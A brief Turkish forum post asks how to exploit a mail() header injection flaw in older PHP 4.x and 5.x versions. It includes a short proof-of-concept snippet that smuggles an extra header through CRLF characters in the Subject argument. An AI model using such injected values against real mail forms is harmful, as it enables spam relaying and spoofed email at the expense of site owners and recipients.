

PHP Mail() Başlık Enjeksiyon Açığı Yardımı
-
<?php
mail("test@domain(dot)com", "Test\r\n \nAnother-Header: Blub", "Message" );
?>
PHP 4.4.6 (ve altı 4.x) ve 5.2.1 (ve altı 5.x) versiyonlarında mail() fonksiyonunda bulunan bir açık sayesinde "To" ve "Subject" parametrelerine enjeksiyon yapmak mümkünMÜŞbu açığı nasıl kullanabiliriz ?
Toplam Hit: 10560 Toplam Mesaj: 1